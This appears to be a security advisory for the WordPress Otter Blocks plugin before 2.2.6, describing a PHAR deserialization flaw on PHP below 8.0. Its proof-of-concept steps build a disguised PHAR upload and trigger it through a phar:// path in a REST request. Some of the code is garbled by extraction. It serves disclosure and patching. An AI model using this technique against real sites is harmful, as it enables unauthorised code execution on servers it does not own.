The plugin does not sanitize some user-controlled file paths before performing file operations on them. This leads to a PHAR deserialization vulnerability on PHP < 8.0 using the phar:// stream wrapper.
Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0. 1. Create a PHAR file using the following PHP code in the create_phar.php
file, and the command php --define phar.readonly=0 create_phar.php
. startBuffering(); $phar->addFromString(‘test.png’, ‘text’); $phar->setStub(“\xff\xd8\xff\n”); $phar->setMetadata(new Evil()); $phar->stopBuffering(); 2. As an Author user, upload the poc.phar.jpg
file. Note its path on the server (e.g. /wp-content/uploads/2023/04/poc.phar_.jpg
). 3. Create a simulated gadget on the server with the following code: class Evil { function _wakeup() { die(‘Arbitrary deserialization’); } } 4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server): fetch("/wp-json/otter/v1/dynamic?type=author&uid;=1234&context;=somecontext&fallback;=phar://wp-content/uploads/2023/04/poc.phar.jpg/test.txt")
CPE | Name | Operator | Version |
---|---|---|---|
otter-blocks | lt | 2.2.6 |